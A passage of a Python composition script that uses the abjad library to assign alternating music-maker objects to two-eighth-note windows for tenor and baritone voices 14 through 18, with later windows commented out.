        # [(112, 8), (114, 8), tenor_three_musicmaker_two],
        # [(114, 8), (116, 8), tenor_three_musicmaker_two],
        # [(116, 8), (118, 8), tenor_three_musicmaker_two],
        # [(118, 8), (120, 8), tenor_three_musicmaker_two],
        # [(120, 8), (122, 8), tenor_three_musicmaker_two],
        # [(122, 8), (124, 8), tenor_three_musicmaker_two],
        # [(124, 8), (126, 8), tenor_three_musicmaker_three],
        # [(126, 8), (128, 8), tenor_three_musicmaker_three],
        # [(128, 8), (130, 8), tenor_three_musicmaker_three],
        # [(130, 8), (132, 8), tenor_three_musicmaker_three],
        # [(132, 8), (134, 8), tenor_three_musicmaker_three],
        # [(134, 8), (136, 8), tenor_three_musicmaker_three],
        # [(136, 8), (138, 8), tenor_three_musicmaker_three],
        # [(138, 8), (140, 8), tenor_three_musicmaker_two],
        # [(140, 8), (142, 8), tenor_three_musicmaker_two],
        # [(142, 8), (144, 8), tenor_three_musicmaker_two],
        # [(144, 8), (146, 8), tenor_three_musicmaker_two],
        # [(146, 8), (148, 8), tenor_three_musicmaker_three],
        # [(148, 8), (150, 8), tenor_three_musicmaker_two],
        # [(150, 8), (152, 8), tenor_three_musicmaker_two],
        # [(152, 8), (154, 8), tenor_three_musicmaker_two],
        # [(154, 8), (156, 8), tenor_three_musicmaker_three],
        # [(156, 8), (158, 8), tenor_three_musicmaker_three],
        # [(158, 8), (160, 8), tenor_three_musicmaker_two],
        # [(160, 8), (162, 8), tenor_three_musicmaker_two],
        # [(162, 8), (164, 8), tenor_three_musicmaker_two],
        # [(164, 8), (166, 8), tenor_three_musicmaker_two],
        # [(166, 8), (168, 8), tenor_three_musicmaker_three],
        # [(168, 8), (170, 8), tenor_three_musicmaker_three],
        # [(170, 8), (172, 8), tenor_three_musicmaker_three],
        # [(172, 8), (174, 8), tenor_three_musicmaker_three],
        # [(174, 8), (176, 8), tenor_three_musicmaker_three],
        # [(176, 8), (178, 8), tenor_three_musicmaker_two],
        # [(178, 8), (180, 8), tenor_three_musicmaker_two],
        # [(180, 8), (182, 8), tenor_three_musicmaker_two],
        # [(182, 8), (184, 8), tenor_three_musicmaker_three],
        # [(184, 8), (186, 8), tenor_three_musicmaker_three],
        # [(186, 8), (188, 8), tenor_three_musicmaker_three],
        # [(188, 8), (190, 8), tenor_three_musicmaker_three],
        # [(190, 8), (192, 8), tenor_three_musicmaker_two],
        # [(192, 8), (194, 8), tenor_three_musicmaker_three],
        # [(194, 8), (196, 8), tenor_three_musicmaker_two],
        # [(196, 8), (198, 8), tenor_three_musicmaker_two],
        # [(198, 8), (199, 8), tenor_three_musicmaker_two],
    ]
])
# Voice 14: one AnnotatedTimespan per two-eighth-note window, each carrying a
# MusicSpecifier that names which tenor-four music-maker is active in that
# window.  Windows tile [0/8, 104/8) contiguously; the remainder of the piece
# (through 199/8) is present but currently disabled (commented out).
voice_14_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 14',
        ),
    )
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), tenor_four_musicmaker_two],
        [(2, 8), (4, 8), tenor_four_musicmaker_two],
        [(4, 8), (6, 8), tenor_four_musicmaker_two],
        [(6, 8), (8, 8), tenor_four_musicmaker_two],
        [(8, 8), (10, 8), tenor_four_musicmaker_two],
        [(10, 8), (12, 8), tenor_four_musicmaker_two],
        [(12, 8), (14, 8), tenor_four_musicmaker_two],
        [(14, 8), (16, 8), tenor_four_musicmaker_two],
        [(16, 8), (18, 8), tenor_four_musicmaker_three],
        [(18, 8), (20, 8), tenor_four_musicmaker_three],
        [(20, 8), (22, 8), tenor_four_musicmaker_three],
        [(22, 8), (24, 8), tenor_four_musicmaker_three],
        [(24, 8), (26, 8), tenor_four_musicmaker_three],
        [(26, 8), (28, 8), tenor_four_musicmaker_three],
        [(28, 8), (30, 8), tenor_four_musicmaker_three],
        [(30, 8), (32, 8), tenor_four_musicmaker_three],
        [(32, 8), (34, 8), tenor_four_musicmaker_two],
        [(34, 8), (36, 8), tenor_four_musicmaker_two],
        [(36, 8), (38, 8), tenor_four_musicmaker_two],
        [(38, 8), (40, 8), tenor_four_musicmaker_two],
        [(40, 8), (42, 8), tenor_four_musicmaker_two],
        [(42, 8), (44, 8), tenor_four_musicmaker_two],
        [(44, 8), (46, 8), tenor_four_musicmaker_two],
        [(46, 8), (48, 8), tenor_four_musicmaker_two],
        [(48, 8), (50, 8), tenor_four_musicmaker_three],
        [(50, 8), (52, 8), tenor_four_musicmaker_three],
        [(52, 8), (54, 8), tenor_four_musicmaker_three],
        [(54, 8), (56, 8), tenor_four_musicmaker_three],
        [(56, 8), (58, 8), tenor_four_musicmaker_three],
        [(58, 8), (60, 8), tenor_four_musicmaker_three],
        [(60, 8), (62, 8), tenor_four_musicmaker_three],
        [(62, 8), (64, 8), tenor_four_musicmaker_two],
        [(64, 8), (66, 8), tenor_four_musicmaker_two],
        [(66, 8), (68, 8), tenor_four_musicmaker_two],
        [(68, 8), (70, 8), tenor_four_musicmaker_two],
        [(70, 8), (72, 8), tenor_four_musicmaker_two],
        [(72, 8), (74, 8), tenor_four_musicmaker_two],
        [(74, 8), (76, 8), tenor_four_musicmaker_three],
        [(76, 8), (78, 8), tenor_four_musicmaker_three],
        [(78, 8), (80, 8), tenor_four_musicmaker_three],
        [(80, 8), (82, 8), tenor_four_musicmaker_three],
        [(82, 8), (84, 8), tenor_four_musicmaker_three],
        [(84, 8), (86, 8), tenor_four_musicmaker_two],
        [(86, 8), (88, 8), tenor_four_musicmaker_two],
        [(88, 8), (90, 8), tenor_four_musicmaker_two],
        [(90, 8), (92, 8), tenor_four_musicmaker_two],
        [(92, 8), (94, 8), tenor_four_musicmaker_three],
        [(94, 8), (96, 8), tenor_four_musicmaker_three],
        [(96, 8), (98, 8), tenor_four_musicmaker_three],
        [(98, 8), (100, 8), tenor_four_musicmaker_two],
        [(100, 8), (102, 8), tenor_four_musicmaker_two],
        [(102, 8), (104, 8), tenor_four_musicmaker_three],
        # Windows from (104, 8) through (199, 8) are currently disabled:
        # [(104, 8), (106, 8), tenor_four_musicmaker_two],
        # [(106, 8), (108, 8), tenor_four_musicmaker_three],
        # [(108, 8), (110, 8), tenor_four_musicmaker_three],
        # [(110, 8), (112, 8), tenor_four_musicmaker_two],
        # [(112, 8), (114, 8), tenor_four_musicmaker_two],
        # [(114, 8), (116, 8), tenor_four_musicmaker_two],
        # [(116, 8), (118, 8), tenor_four_musicmaker_three],
        # [(118, 8), (120, 8), tenor_four_musicmaker_three],
        # [(120, 8), (122, 8), tenor_four_musicmaker_three],
        # [(122, 8), (124, 8), tenor_four_musicmaker_three],
        # [(124, 8), (126, 8), tenor_four_musicmaker_two],
        # [(126, 8), (128, 8), tenor_four_musicmaker_two],
        # [(128, 8), (130, 8), tenor_four_musicmaker_two],
        # [(130, 8), (132, 8), tenor_four_musicmaker_two],
        # [(132, 8), (134, 8), tenor_four_musicmaker_two],
        # [(134, 8), (136, 8), tenor_four_musicmaker_three],
        # [(136, 8), (138, 8), tenor_four_musicmaker_three],
        # [(138, 8), (140, 8), tenor_four_musicmaker_three],
        # [(140, 8), (142, 8), tenor_four_musicmaker_three],
        # [(142, 8), (144, 8), tenor_four_musicmaker_three],
        # [(144, 8), (146, 8), tenor_four_musicmaker_three],
        # [(146, 8), (148, 8), tenor_four_musicmaker_two],
        # [(148, 8), (150, 8), tenor_four_musicmaker_two],
        # [(150, 8), (152, 8), tenor_four_musicmaker_two],
        # [(152, 8), (154, 8), tenor_four_musicmaker_two],
        # [(154, 8), (156, 8), tenor_four_musicmaker_two],
        # [(156, 8), (158, 8), tenor_four_musicmaker_two],
        # [(158, 8), (160, 8), tenor_four_musicmaker_two],
        # [(160, 8), (162, 8), tenor_four_musicmaker_three],
        # [(162, 8), (164, 8), tenor_four_musicmaker_three],
        # [(164, 8), (166, 8), tenor_four_musicmaker_three],
        # [(166, 8), (168, 8), tenor_four_musicmaker_three],
        # [(168, 8), (170, 8), tenor_four_musicmaker_three],
        # [(170, 8), (172, 8), tenor_four_musicmaker_three],
        # [(172, 8), (174, 8), tenor_four_musicmaker_three],
        # [(174, 8), (176, 8), tenor_four_musicmaker_three],
        # [(176, 8), (178, 8), tenor_four_musicmaker_two],
        # [(178, 8), (180, 8), tenor_four_musicmaker_two],
        # [(180, 8), (182, 8), tenor_four_musicmaker_two],
        # [(182, 8), (184, 8), tenor_four_musicmaker_two],
        # [(184, 8), (186, 8), tenor_four_musicmaker_two],
        # [(186, 8), (188, 8), tenor_four_musicmaker_two],
        # [(188, 8), (190, 8), tenor_four_musicmaker_two],
        # [(190, 8), (192, 8), tenor_four_musicmaker_two],
        # [(192, 8), (194, 8), tenor_four_musicmaker_three],
        # [(194, 8), (196, 8), tenor_four_musicmaker_three],
        # [(196, 8), (198, 8), tenor_four_musicmaker_two],
        # [(198, 8), (199, 8), tenor_four_musicmaker_two],
    ]
])
# Voice 15: one AnnotatedTimespan per two-eighth-note window, each carrying a
# MusicSpecifier that names which tenor-five music-maker is active in that
# window.  Windows tile [0/8, 104/8) contiguously; the remainder of the piece
# (through 199/8) is present but currently disabled (commented out).
voice_15_timespan_list = abjad.TimespanList([
    abjad.AnnotatedTimespan(
        start_offset=start_offset,
        stop_offset=stop_offset,
        annotation=MusicSpecifier(
            music_maker=music_maker,
            voice_name='Voice 15',
        ),
    )
    for start_offset, stop_offset, music_maker in [
        [(0, 8), (2, 8), tenor_five_musicmaker_two],
        [(2, 8), (4, 8), tenor_five_musicmaker_two],
        [(4, 8), (6, 8), tenor_five_musicmaker_two],
        [(6, 8), (8, 8), tenor_five_musicmaker_three],
        [(8, 8), (10, 8), tenor_five_musicmaker_three],
        [(10, 8), (12, 8), tenor_five_musicmaker_three],
        [(12, 8), (14, 8), tenor_five_musicmaker_two],
        [(14, 8), (16, 8), tenor_five_musicmaker_two],
        [(16, 8), (18, 8), tenor_five_musicmaker_two],
        [(18, 8), (20, 8), tenor_five_musicmaker_two],
        [(20, 8), (22, 8), tenor_five_musicmaker_three],
        [(22, 8), (24, 8), tenor_five_musicmaker_three],
        [(24, 8), (26, 8), tenor_five_musicmaker_three],
        [(26, 8), (28, 8), tenor_five_musicmaker_three],
        [(28, 8), (30, 8), tenor_five_musicmaker_two],
        [(30, 8), (32, 8), tenor_five_musicmaker_two],
        [(32, 8), (34, 8), tenor_five_musicmaker_two],
        [(34, 8), (36, 8), tenor_five_musicmaker_three],
        [(36, 8), (38, 8), tenor_five_musicmaker_three],
        [(38, 8), (40, 8), tenor_five_musicmaker_three],
        [(40, 8), (42, 8), tenor_five_musicmaker_three],
        [(42, 8), (44, 8), tenor_five_musicmaker_two],
        [(44, 8), (46, 8), tenor_five_musicmaker_two],
        [(46, 8), (48, 8), tenor_five_musicmaker_three],
        [(48, 8), (50, 8), tenor_five_musicmaker_three],
        [(50, 8), (52, 8), tenor_five_musicmaker_three],
        [(52, 8), (54, 8), tenor_five_musicmaker_three],
        [(54, 8), (56, 8), tenor_five_musicmaker_three],
        [(56, 8), (58, 8), tenor_five_musicmaker_three],
        [(58, 8), (60, 8), tenor_five_musicmaker_two],
        [(60, 8), (62, 8), tenor_five_musicmaker_three],
        [(62, 8), (64, 8), tenor_five_musicmaker_three],
        [(64, 8), (66, 8), tenor_five_musicmaker_three],
        [(66, 8), (68, 8), tenor_five_musicmaker_three],
        [(68, 8), (70, 8), tenor_five_musicmaker_three],
        [(70, 8), (72, 8), tenor_five_musicmaker_three],
        [(72, 8), (74, 8), tenor_five_musicmaker_three],
        [(74, 8), (76, 8), tenor_five_musicmaker_two],
        [(76, 8), (78, 8), tenor_five_musicmaker_two],
        [(78, 8), (80, 8), tenor_five_musicmaker_two],
        [(80, 8), (82, 8), tenor_five_musicmaker_two],
        [(82, 8), (84, 8), tenor_five_musicmaker_two],
        [(84, 8), (86, 8), tenor_five_musicmaker_two],
        [(86, 8), (88, 8), tenor_five_musicmaker_two],
        [(88, 8), (90, 8), tenor_five_musicmaker_two],
        [(90, 8), (92, 8), tenor_five_musicmaker_three],
        [(92, 8), (94, 8), tenor_five_musicmaker_three],
        [(94, 8), (96, 8), tenor_five_musicmaker_three],
        [(96, 8), (98, 8), tenor_five_musicmaker_three],
        [(98, 8), (100, 8), tenor_five_musicmaker_three],
        [(100, 8), (102, 8), tenor_five_musicmaker_three],
        [(102, 8), (104, 8), tenor_five_musicmaker_three],
        # Windows from (104, 8) through (199, 8) are currently disabled:
        # [(104, 8), (106, 8), tenor_five_musicmaker_two],
        # [(106, 8), (108, 8), tenor_five_musicmaker_two],
        # [(108, 8), (110, 8), tenor_five_musicmaker_two],
        # [(110, 8), (112, 8), tenor_five_musicmaker_two],
        # [(112, 8), (114, 8), tenor_five_musicmaker_two],
        # [(114, 8), (116, 8), tenor_five_musicmaker_two],
        # [(116, 8), (118, 8), tenor_five_musicmaker_two],
        # [(118, 8), (120, 8), tenor_five_musicmaker_three],
        # [(120, 8), (122, 8), tenor_five_musicmaker_three],
        # [(122, 8), (124, 8), tenor_five_musicmaker_three],
        # [(124, 8), (126, 8), tenor_five_musicmaker_three],
        # [(126, 8), (128, 8), tenor_five_musicmaker_three],
        # [(128, 8), (130, 8), tenor_five_musicmaker_three],
        # [(130, 8), (132, 8), tenor_five_musicmaker_three],
        # [(132, 8), (134, 8), tenor_five_musicmaker_three],
        # [(134, 8), (136, 8), tenor_five_musicmaker_two],
        # [(136, 8), (138, 8), tenor_five_musicmaker_two],
        # [(138, 8), (140, 8), tenor_five_musicmaker_two],
        # [(140, 8), (142, 8), tenor_five_musicmaker_two],
        # [(142, 8), (144, 8), tenor_five_musicmaker_two],
        # [(144, 8), (146, 8), tenor_five_musicmaker_two],
        # [(146, 8), (148, 8), tenor_five_musicmaker_two],
        # [(148, 8), (150, 8), tenor_five_musicmaker_three],
        # [(150, 8), (152, 8), tenor_five_musicmaker_two],
        # [(152, 8), (154, 8), tenor_five_musicmaker_two],
        # [(154, 8), (156, 8), tenor_five_musicmaker_three],
        # [(156, 8), (158, 8), tenor_five_musicmaker_three],
        # [(158, 8), (160, 8), tenor_five_musicmaker_two],
        # [(160, 8), (162, 8), tenor_five_musicmaker_two],
        # [(162, 8), (164, 8), tenor_five_musicmaker_two],
        # [(164, 8), (166, 8), tenor_five_musicmaker_three],
        # [(166, 8), (168, 8), tenor_five_musicmaker_three],
        # [(168, 8), (170, 8), tenor_five_musicmaker_two],
        # [(170, 8), (172, 8), tenor_five_musicmaker_two],
        # [(172, 8), (174, 8), tenor_five_musicmaker_two],
        # [(174, 8), (176, 8), tenor_five_musicmaker_two],
        # [(176, 8), (178, 8), tenor_five_musicmaker_three],
        # [(178, 8), (180, 8), tenor_five_musicmaker_three],
        # [(180, 8), (182, 8), tenor_five_musicmaker_two],
        # [(182, 8), (184, 8), tenor_five_musicmaker_two],
        # [(184, 8), (186, 8), tenor_five_musicmaker_two],
        # [(186, 8), (188, 8), tenor_five_musicmaker_two],
        # [(188, 8), (190, 8), tenor_five_musicmaker_two],
        # [(190, 8), (192, 8), tenor_five_musicmaker_three],
        # [(192, 8), (194, 8), tenor_five_musicmaker_three],
        # [(194, 8), (196, 8), tenor_five_musicmaker_three],
        # [(196, 8), (198, 8), tenor_five_musicmaker_three],
        # [(198, 8), (199, 8), tenor_five_musicmaker_three],
    ]
])
voice_16_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 16',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), baritone_one_musicmaker_two],
[(2, 8), (4, 8), baritone_one_musicmaker_two],
[(4, 8), (6, 8), baritone_one_musicmaker_two],
[(6, 8), (8, 8), baritone_one_musicmaker_two],
[(8, 8), (10, 8), baritone_one_musicmaker_three],
[(10, 8), (12, 8), baritone_one_musicmaker_three],
[(12, 8), (14, 8), baritone_one_musicmaker_three],
[(14, 8), (16, 8), baritone_one_musicmaker_two],
[(16, 8), (18, 8), baritone_one_musicmaker_two],
[(18, 8), (20, 8), baritone_one_musicmaker_two],
[(20, 8), (22, 8), baritone_one_musicmaker_two],
[(22, 8), (24, 8), baritone_one_musicmaker_three],
[(24, 8), (26, 8), baritone_one_musicmaker_three],
[(26, 8), (28, 8), baritone_one_musicmaker_three],
[(28, 8), (30, 8), baritone_one_musicmaker_two],
[(30, 8), (32, 8), baritone_one_musicmaker_two],
[(32, 8), (34, 8), baritone_one_musicmaker_two],
[(34, 8), (36, 8), baritone_one_musicmaker_two],
[(36, 8), (38, 8), baritone_one_musicmaker_three],
[(38, 8), (40, 8), baritone_one_musicmaker_three],
[(40, 8), (42, 8), baritone_one_musicmaker_three],
[(42, 8), (44, 8), baritone_one_musicmaker_two],
[(44, 8), (46, 8), baritone_one_musicmaker_two],
[(46, 8), (48, 8), baritone_one_musicmaker_two],
[(48, 8), (50, 8), baritone_one_musicmaker_two],
[(50, 8), (52, 8), baritone_one_musicmaker_three],
[(52, 8), (54, 8), baritone_one_musicmaker_three],
[(54, 8), (56, 8), baritone_one_musicmaker_three],
[(56, 8), (58, 8), baritone_one_musicmaker_two],
[(58, 8), (60, 8), baritone_one_musicmaker_two],
[(60, 8), (62, 8), baritone_one_musicmaker_two],
[(62, 8), (64, 8), baritone_one_musicmaker_two],
[(64, 8), (66, 8), baritone_one_musicmaker_three],
[(66, 8), (68, 8), baritone_one_musicmaker_three],
[(68, 8), (70, 8), baritone_one_musicmaker_three],
[(70, 8), (72, 8), baritone_one_musicmaker_two],
[(72, 8), (74, 8), baritone_one_musicmaker_two],
[(74, 8), (76, 8), baritone_one_musicmaker_two],
[(76, 8), (78, 8), baritone_one_musicmaker_two],
[(78, 8), (80, 8), baritone_one_musicmaker_three],
[(80, 8), (82, 8), baritone_one_musicmaker_three],
[(82, 8), (84, 8), baritone_one_musicmaker_three],
[(84, 8), (86, 8), baritone_one_musicmaker_two],
[(86, 8), (88, 8), baritone_one_musicmaker_two],
[(88, 8), (90, 8), baritone_one_musicmaker_two],
[(90, 8), (92, 8), baritone_one_musicmaker_two],
[(92, 8), (94, 8), baritone_one_musicmaker_three],
[(94, 8), (96, 8), baritone_one_musicmaker_three],
[(96, 8), (98, 8), baritone_one_musicmaker_three],
[(98, 8), (100, 8), baritone_one_musicmaker_two],
[(100, 8), (102, 8), baritone_one_musicmaker_two],
[(102, 8), (104, 8), baritone_one_musicmaker_two],
# [(104, 8), (106, 8), baritone_one_musicmaker_two],
# [(106, 8), (108, 8), baritone_one_musicmaker_three],
# [(108, 8), (110, 8), baritone_one_musicmaker_three],
# [(110, 8), (112, 8), baritone_one_musicmaker_three],
# [(112, 8), (114, 8), baritone_one_musicmaker_three],
# [(114, 8), (116, 8), baritone_one_musicmaker_two],
# [(116, 8), (118, 8), baritone_one_musicmaker_two],
# [(118, 8), (120, 8), baritone_one_musicmaker_two],
# [(120, 8), (122, 8), baritone_one_musicmaker_three],
# [(122, 8), (124, 8), baritone_one_musicmaker_three],
# [(124, 8), (126, 8), baritone_one_musicmaker_three],
# [(126, 8), (128, 8), baritone_one_musicmaker_three],
# [(128, 8), (130, 8), baritone_one_musicmaker_two],
# [(130, 8), (132, 8), baritone_one_musicmaker_two],
# [(132, 8), (134, 8), baritone_one_musicmaker_two],
# [(134, 8), (136, 8), baritone_one_musicmaker_three],
# [(136, 8), (138, 8), baritone_one_musicmaker_three],
# [(138, 8), (140, 8), baritone_one_musicmaker_three],
# [(140, 8), (142, 8), baritone_one_musicmaker_three],
# [(142, 8), (144, 8), baritone_one_musicmaker_two],
# [(144, 8), (146, 8), baritone_one_musicmaker_two],
# [(146, 8), (148, 8), baritone_one_musicmaker_two],
# [(148, 8), (150, 8), baritone_one_musicmaker_three],
# [(150, 8), (152, 8), baritone_one_musicmaker_three],
# [(152, 8), (154, 8), baritone_one_musicmaker_three],
# [(154, 8), (156, 8), baritone_one_musicmaker_three],
# [(156, 8), (158, 8), baritone_one_musicmaker_two],
# [(158, 8), (160, 8), baritone_one_musicmaker_two],
# [(160, 8), (162, 8), baritone_one_musicmaker_two],
# [(162, 8), (164, 8), baritone_one_musicmaker_three],
# [(164, 8), (166, 8), baritone_one_musicmaker_three],
# [(166, 8), (168, 8), baritone_one_musicmaker_three],
# [(168, 8), (170, 8), baritone_one_musicmaker_three],
# [(170, 8), (172, 8), baritone_one_musicmaker_two],
# [(172, 8), (174, 8), baritone_one_musicmaker_two],
# [(174, 8), (176, 8), baritone_one_musicmaker_two],
# [(176, 8), (178, 8), baritone_one_musicmaker_three],
# [(178, 8), (180, 8), baritone_one_musicmaker_three],
# [(180, 8), (182, 8), baritone_one_musicmaker_three],
# [(182, 8), (184, 8), baritone_one_musicmaker_three],
# [(184, 8), (186, 8), baritone_one_musicmaker_two],
# [(186, 8), (188, 8), baritone_one_musicmaker_two],
# [(188, 8), (190, 8), baritone_one_musicmaker_two],
# [(190, 8), (192, 8), baritone_one_musicmaker_three],
# [(192, 8), (194, 8), baritone_one_musicmaker_three],
# [(194, 8), (196, 8), baritone_one_musicmaker_three],
# [(196, 8), (198, 8), baritone_one_musicmaker_three],
# [(198, 8), (199, 8), baritone_one_musicmaker_two],
]
])
voice_17_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 17',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), baritone_two_musicmaker_three],
[(2, 8), (4, 8), baritone_two_musicmaker_three],
[(4, 8), (6, 8), baritone_two_musicmaker_two],
[(6, 8), (8, 8), baritone_two_musicmaker_two],
[(8, 8), (10, 8), baritone_two_musicmaker_two],
[(10, 8), (12, 8), baritone_two_musicmaker_three],
[(12, 8), (14, 8), baritone_two_musicmaker_three],
[(14, 8), (16, 8), baritone_two_musicmaker_three],
[(16, 8), (18, 8), baritone_two_musicmaker_three],
[(18, 8), (20, 8), baritone_two_musicmaker_two],
[(20, 8), (22, 8), baritone_two_musicmaker_two],
[(22, 8), (24, 8), baritone_two_musicmaker_two],
[(24, 8), (26, 8), baritone_two_musicmaker_two],
[(26, 8), (28, 8), baritone_two_musicmaker_two],
[(28, 8), (30, 8), baritone_two_musicmaker_three],
[(30, 8), (32, 8), baritone_two_musicmaker_three],
[(32, 8), (34, 8), baritone_two_musicmaker_three],
[(34, 8), (36, 8), baritone_two_musicmaker_three],
[(36, 8), (38, 8), baritone_two_musicmaker_three],
[(38, 8), (40, 8), baritone_two_musicmaker_three],
[(40, 8), (42, 8), baritone_two_musicmaker_two],
[(42, 8), (44, 8), baritone_two_musicmaker_two],
[(44, 8), (46, 8), baritone_two_musicmaker_two],
[(46, 8), (48, 8), baritone_two_musicmaker_two],
[(48, 8), (50, 8), baritone_two_musicmaker_two],
[(50, 8), (52, 8), baritone_two_musicmaker_two],
[(52, 8), (54, 8), baritone_two_musicmaker_two],
[(54, 8), (56, 8), baritone_two_musicmaker_three],
[(56, 8), (58, 8), baritone_two_musicmaker_three],
[(58, 8), (60, 8), baritone_two_musicmaker_three],
[(60, 8), (62, 8), baritone_two_musicmaker_three],
[(62, 8), (64, 8), baritone_two_musicmaker_three],
[(64, 8), (66, 8), baritone_two_musicmaker_three],
[(66, 8), (68, 8), baritone_two_musicmaker_three],
[(68, 8), (70, 8), baritone_two_musicmaker_two],
[(70, 8), (72, 8), baritone_two_musicmaker_two],
[(72, 8), (74, 8), baritone_two_musicmaker_two],
[(74, 8), (76, 8), baritone_two_musicmaker_two],
[(76, 8), (78, 8), baritone_two_musicmaker_two],
[(78, 8), (80, 8), baritone_two_musicmaker_two],
[(80, 8), (82, 8), baritone_two_musicmaker_two],
[(82, 8), (84, 8), baritone_two_musicmaker_three],
[(84, 8), (86, 8), baritone_two_musicmaker_three],
[(86, 8), (88, 8), baritone_two_musicmaker_three],
[(88, 8), (90, 8), baritone_two_musicmaker_three],
[(90, 8), (92, 8), baritone_two_musicmaker_three],
[(92, 8), (94, 8), baritone_two_musicmaker_three],
[(94, 8), (96, 8), baritone_two_musicmaker_three],
[(96, 8), (98, 8), baritone_two_musicmaker_two],
[(98, 8), (100, 8), baritone_two_musicmaker_two],
[(100, 8), (102, 8), baritone_two_musicmaker_two],
[(102, 8), (104, 8), baritone_two_musicmaker_two],
# [(104, 8), (106, 8), baritone_two_musicmaker_two],
# [(106, 8), (108, 8), baritone_two_musicmaker_three],
# [(108, 8), (110, 8), baritone_two_musicmaker_three],
# [(110, 8), (112, 8), baritone_two_musicmaker_three],
# [(112, 8), (114, 8), baritone_two_musicmaker_three],
# [(114, 8), (116, 8), baritone_two_musicmaker_three],
# [(116, 8), (118, 8), baritone_two_musicmaker_two],
# [(118, 8), (120, 8), baritone_two_musicmaker_two],
# [(120, 8), (122, 8), baritone_two_musicmaker_two],
# [(122, 8), (124, 8), baritone_two_musicmaker_two],
# [(124, 8), (126, 8), baritone_two_musicmaker_two],
# [(126, 8), (128, 8), baritone_two_musicmaker_three],
# [(128, 8), (130, 8), baritone_two_musicmaker_three],
# [(130, 8), (132, 8), baritone_two_musicmaker_three],
# [(132, 8), (134, 8), baritone_two_musicmaker_three],
# [(134, 8), (136, 8), baritone_two_musicmaker_three],
# [(136, 8), (138, 8), baritone_two_musicmaker_two],
# [(138, 8), (140, 8), baritone_two_musicmaker_two],
# [(140, 8), (142, 8), baritone_two_musicmaker_two],
# [(142, 8), (144, 8), baritone_two_musicmaker_two],
# [(144, 8), (146, 8), baritone_two_musicmaker_two],
# [(146, 8), (148, 8), baritone_two_musicmaker_three],
# [(148, 8), (150, 8), baritone_two_musicmaker_three],
# [(150, 8), (152, 8), baritone_two_musicmaker_three],
# [(152, 8), (154, 8), baritone_two_musicmaker_three],
# [(154, 8), (156, 8), baritone_two_musicmaker_three],
# [(156, 8), (158, 8), baritone_two_musicmaker_two],
# [(158, 8), (160, 8), baritone_two_musicmaker_two],
# [(160, 8), (162, 8), baritone_two_musicmaker_two],
# [(162, 8), (164, 8), baritone_two_musicmaker_three],
# [(164, 8), (166, 8), baritone_two_musicmaker_three],
# [(166, 8), (168, 8), baritone_two_musicmaker_three],
# [(168, 8), (170, 8), baritone_two_musicmaker_two],
# [(170, 8), (172, 8), baritone_two_musicmaker_two],
# [(172, 8), (174, 8), baritone_two_musicmaker_two],
# [(174, 8), (176, 8), baritone_two_musicmaker_three],
# [(176, 8), (178, 8), baritone_two_musicmaker_three],
# [(178, 8), (180, 8), baritone_two_musicmaker_three],
# [(180, 8), (182, 8), baritone_two_musicmaker_two],
# [(182, 8), (184, 8), baritone_two_musicmaker_two],
# [(184, 8), (186, 8), baritone_two_musicmaker_two],
# [(186, 8), (188, 8), baritone_two_musicmaker_three],
# [(188, 8), (190, 8), baritone_two_musicmaker_three],
# [(190, 8), (192, 8), baritone_two_musicmaker_three],
# [(192, 8), (194, 8), baritone_two_musicmaker_two],
# [(194, 8), (196, 8), baritone_two_musicmaker_two],
# [(196, 8), (198, 8), baritone_two_musicmaker_two],
# [(198, 8), (199, 8), baritone_two_musicmaker_three],
]
])
voice_18_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 18',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), baritone_three_musicmaker_three],
[(2, 8), (4, 8), baritone_three_musicmaker_three],
[(4, 8), (6, 8), baritone_three_musicmaker_three],
[(6, 8), (8, 8), baritone_three_musicmaker_three],
[(8, 8), (10, 8), baritone_three_musicmaker_two],
[(10, 8), (12, 8), baritone_three_musicmaker_two],
[(12, 8), (14, 8), baritone_three_musicmaker_two],
[(14, 8), (16, 8), baritone_three_musicmaker_two],
[(16, 8), (18, 8), baritone_three_musicmaker_three],
[(18, 8), (20, 8), baritone_three_musicmaker_three],
[(20, 8), (22, 8), baritone_three_musicmaker_three],
[(22, 8), (24, 8), baritone_three_musicmaker_three],
[(24, 8), (26, 8), baritone_three_musicmaker_two],
[(26, 8), (28, 8), baritone_three_musicmaker_two],
[(28, 8), (30, 8), baritone_three_musicmaker_two],
[(30, 8), (32, 8), baritone_three_musicmaker_two],
[(32, 8), (34, 8), baritone_three_musicmaker_three],
[(34, 8), (36, 8), baritone_three_musicmaker_three],
[(36, 8), (38, 8), baritone_three_musicmaker_three],
[(38, 8), (40, 8), baritone_three_musicmaker_three],
[(40, 8), (42, 8), baritone_three_musicmaker_two],
[(42, 8), (44, 8), baritone_three_musicmaker_two],
[(44, 8), (46, 8), baritone_three_musicmaker_two],
[(46, 8), (48, 8), baritone_three_musicmaker_two],
[(48, 8), (50, 8), baritone_three_musicmaker_three],
[(50, 8), (52, 8), baritone_three_musicmaker_three],
[(52, 8), (54, 8), baritone_three_musicmaker_three],
[(54, 8), (56, 8), baritone_three_musicmaker_three],
[(56, 8), (58, 8), baritone_three_musicmaker_two],
[(58, 8), (60, 8), baritone_three_musicmaker_two],
[(60, 8), (62, 8), baritone_three_musicmaker_two],
[(62, 8), (64, 8), baritone_three_musicmaker_two],
[(64, 8), (66, 8), baritone_three_musicmaker_three],
[(66, 8), (68, 8), baritone_three_musicmaker_three],
[(68, 8), (70, 8), baritone_three_musicmaker_three],
[(70, 8), (72, 8), baritone_three_musicmaker_three],
[(72, 8), (74, 8), baritone_three_musicmaker_two],
[(74, 8), (76, 8), baritone_three_musicmaker_two],
[(76, 8), (78, 8), baritone_three_musicmaker_two],
[(78, 8), (80, 8), baritone_three_musicmaker_two],
[(80, 8), (82, 8), baritone_three_musicmaker_three],
